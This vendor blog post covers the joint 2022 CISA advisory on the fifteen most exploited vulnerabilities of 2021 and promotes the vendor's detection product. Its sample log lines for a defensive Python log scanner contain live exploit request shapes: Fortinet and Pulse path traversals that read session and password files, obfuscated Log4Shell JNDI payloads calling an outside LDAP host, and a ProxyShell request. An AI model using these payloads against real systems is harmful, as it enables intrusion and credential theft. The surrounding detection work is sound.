On April 27, 2022, the Cybersecurity and Infrastructure Security Agency (CISA) published a joint advisory with the NSA, FBI, ACSC and other cybersecurity authorities detailing the top 15 vulnerabilities routinely exploited by threat actors in 2021, along with other CVEs that were frequently exploited.
Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities and two were privilege escalation flaws; either kind can let a threat actor take over a system remotely.
Unpatched, internet-facing devices and systems are an easy entry point, because they give attackers a reliable and repeatable initial access method. Several of these vulnerabilities appeared in ransomware attack chains, and ransomware is one of today's top threats to operational technology.
Many of these vulnerabilities share the characteristics that make a flaw widely exploitable: they sit in widely deployed products, so a single bug is present on a very large number of systems, and reliable public exploit code exists for them.
In the past year, threat actors targeted internet-facing systems such as email servers and VPN servers with exploits for newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, proof-of-concept code was publicly released within two weeks of disclosure, which leaves only a short window for patching. (Read more about when to patch, and when not to, here.)
Threat actors also continued to exploit older, publicly known vulnerabilities, a continuing risk for organizations that do not patch software in a timely manner or that run software the vendor no longer supports.
The Top 15 Routinely Exploited Vulnerabilities
The top vulnerabilities show how threat actors exploited newly disclosed flaws in widely deployed services to achieve broad and long-lasting impact on organizations. Nine of the 15 are remote code execution bugs and two are privilege escalation bugs; the remainder are arbitrary file read and path traversal flaws that hand attackers credentials, or bugs that are chained with others to reach code execution.
The most exploited vulnerabilities were:
- CVE-2021-44228 - known as Log4Shell, this vulnerability affects the Apache Log4j 2 library, an open-source Java logging framework. If attacker-controlled input (a User-Agent header, a username, a search string) is logged, a `${jndi:...}` lookup embedded in that input makes the application fetch and execute attacker-supplied code, giving unauthenticated remote code execution on any Java application that logs with a vulnerable Log4j version.
- CVE-2020-1472 - known as ZeroLogon, this vulnerability affects the Netlogon Remote Protocol (MS-NRPC) used by Active Directory domain controllers. A cryptographic flaw in the protocol's authentication lets an unauthenticated attacker with network access to a domain controller establish a Netlogon secure channel without valid credentials and reset the domain controller's machine account password, from which full domain compromise follows.
- CVE-2019-11510 - this vulnerability affects the Pulse Connect Secure SSL VPN. An unauthenticated remote attacker can read arbitrary files from the appliance, including files holding session data and cached credentials.
- CVE-2018-13379 - this vulnerability affects the SSL VPN web portal of Fortinet FortiGate appliances. A path traversal lets an unauthenticated attacker read arbitrary system files, including the session file that holds plaintext usernames and passwords of logged-in VPN users.
- CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065 - known together as ProxyLogon, these vulnerabilities affect on-premises Microsoft Exchange servers. CVE-2021-26855 is a pre-authentication server-side request forgery, CVE-2021-26857 an insecure deserialization, and CVE-2021-26858 and CVE-2021-27065 post-authentication arbitrary file writes. Chained, they let an unauthenticated attacker execute arbitrary code on the Exchange server and, because Exchange holds highly privileged Active Directory permissions, undermine trust and identity across the domain.
- CVE-2021-34523, CVE-2021-34473, CVE-2021-31207 - known together as ProxyShell, these vulnerabilities also affect on-premises Microsoft Exchange servers. CVE-2021-34473 is a pre-authentication path confusion in the Autodiscover front end, CVE-2021-34523 an elevation of privilege in the Exchange PowerShell backend, and CVE-2021-31207 a post-authentication arbitrary file write. Chained, they let a remote attacker execute arbitrary code on the server without credentials.
As our customers are well aware, the SCADAfence Platform detects exploitation attempts against these vulnerabilities, flags unexpected connections to and from external devices, and flags unexpected connections to and from the Internet. Such connections raise alerts indicating that a malicious threat actor may be attempting to exploit a vulnerability.
The platform also detects suspicious behavior based on IP, file hash and domain reputation.
The SCADAfence Platform can help identify where the network is exposed to risk by matching exposed assets against the vulnerabilities that affect them.
Additionally, the User Activity Analyzer can be used to track propagation attempts by malicious actors once they are inside the network.
Network Threat Detection: Exploitation Attempts
The SCADAfence Platform detects exploitation attempts of the following vulnerabilities:
- CVE-2021-44228 (Log4Shell) - this vulnerability was exploited at massive scale; thousands of products embed Log4j and were exposed to Log4Shell exploitation.
- CVE-2020-1472 (ZeroLogon) - this vulnerability has been observed in the attack chain of ransomware actors such as Ryuk.
- CVE-2019-11510 (Pulse) - although patches for this vulnerability were released in April 2019, there have been multiple incidents in which Active Directory credentials stolen through this flaw were used months after the victim organization had patched its VPN appliance.
- CVE-2018-13379 (Fortinet) - this vulnerability has been exploited routinely since 2019, frequently to gain the initial access used to deploy ransomware.
The SCADAfence research team constantly monitors newly disclosed vulnerabilities as well as routinely exploited ones, and works to continuously improve the platform's network-based detection of exploitation attempts.
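To make concrete what a network-side detection for the four CVEs listed above (and described in the top-15 list earlier) looks like, here is an added example. It is not SCADAfence code and not part of the advisory: a scanner that reads constructed web-access-log lines and matches the publicly known request shapes of CVE-2018-13379, CVE-2019-11510, the ProxyShell entry point CVE-2021-34473, and Log4Shell, including the `${lower:...}` and `${::-...}` lookup tricks attackers use to evade naive string matching. The log lines, hosts and payload strings are constructed for the example, and the signature regexes are assumptions that a real deployment would tune against its own traffic.

```python
"""Scan web-server access logs for exploitation attempts of four routinely
exploited CVEs. Added example; the sample data is constructed, not a capture."""
import re
import urllib.parse
from dataclasses import dataclass
from typing import List

# Constructed combined-format access-log lines (hosts are documentation ranges).
# Line 1 is benign; lines 2-6 carry the public request shapes of the CVEs below.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2022:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [27/Apr/2022:10:01:13 +0000] "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 200 9120 "-" "curl/7.68.0"
203.0.113.9 - - [27/Apr/2022:10:01:14 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1450 "-" "python-requests/2.25"
203.0.113.10 - - [27/Apr/2022:10:01:15 +0000] "GET /api/status HTTP/1.1" 200 40 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.11 - - [27/Apr/2022:10:01:16 +0000] "GET /login HTTP/1.1" 200 40 "-" "${${lower:j}${lower:n}di:${::-l}dap://198.51.100.5:1389/x}"
203.0.113.12 - - [27/Apr/2022:10:01:17 +0000] "GET /autodiscover/autodiscover.json?@test.local/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.local HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""

# Combined log format: src ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Log4j lookup forms used to hide the string "jndi": ${lower:j}, ${upper:J},
# ${::-j} and ${env:NOPE:-j} all evaluate to "j" (assumed set; extend as needed).
LOOKUP_RE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")


@dataclass
class Finding:
    src: str       # client address from the log line
    cve: str       # CVE the request shape matches
    field: str     # which log field carried the payload
    evidence: str  # the matched substring, after normalization


def normalize(value: str) -> str:
    """URL-decode until stable (scanners double- and triple-encode), then lowercase."""
    for _ in range(4):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def collapse_lookups(value: str) -> str:
    """Resolve nested Log4j lookups from the inside out so the bare ${jndi: appears."""
    prev = None
    while prev != value:
        prev = value
        value = LOOKUP_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), value)
    return value


# (cve, fields to inspect, pattern on the normalized field, collapse Log4j lookups?)
RULES = (
    ("CVE-2018-13379", ("target",),
     re.compile(r"/remote/fgt_lang\?lang=\S*sslvpn_websession"), False),
    ("CVE-2019-11510", ("target",),
     re.compile(r"/dana-na/\.\./dana/html5acc/guacamole/(?:\.\./)+"), False),
    ("CVE-2021-34473", ("target",),
     re.compile(r"/autodiscover/autodiscover\.json\?\S*@"), False),
    ("CVE-2021-44228", ("target", "referer", "ua"),
     re.compile(r"\$\{jndi:"), True),
)


def scan(log_text: str) -> List[Finding]:
    """Return one Finding per (line, rule) whose request shape matches."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real deployment would count these
        for cve, fields, pattern, collapse in RULES:
            for field in fields:
                value = normalize(m.group(field))
                if collapse:
                    value = collapse_lookups(value)
                hit = pattern.search(value)
                if hit:
                    findings.append(Finding(m.group("src"), cve, field, hit.group(0)))
                    break  # one finding per rule per line is enough
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.src:<14} {f.cve:<15} in {f.field:<8} {f.evidence}")
```

The point of `normalize` and `collapse_lookups` is that a plain substring match on `${jndi:` or `sslvpn_websession` is trivially bypassed by percent-encoding or by the lookup nesting shown on the fifth sample line; decode and resolve first, then match. Status codes are deliberately ignored: a 200 on the Fortinet or Pulse request is a successful read, but a 404 still tells you who is scanning your VPN portal.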
Recommendations for Reducing Cybersecurity Risk
Our researchers recommend the following measures to minimize the risk of exploitation:
- Limit Network Exposure – minimize network exposure for all control system devices and systems, and ensure they are not reachable from the Internet.
- Monitor Network Traffic – monitor access to the production segments. In your network monitoring tool (and we know a really good one), create logical groups of the affected devices and define traffic rules that alert on suspicious access to them.
- Monitor User Activity – if you are a customer, use the SCADAfence Platform to monitor access to the affected devices and track user activity in the User Activity View.
- Connect to the SCADAfence Cloud – again, if you are a customer, connect your SCADAfence Platform to the SCADAfence Cloud to receive the latest signature and CVE updates.
In addition, update the software, operating systems, applications and firmware on IT network assets in a timely manner, prioritizing patches for vulnerabilities that are known to be exploited in the wild.
If you’re not a customer yet and would like to see how this works from up close, you can watch a short OT & IoT security demo.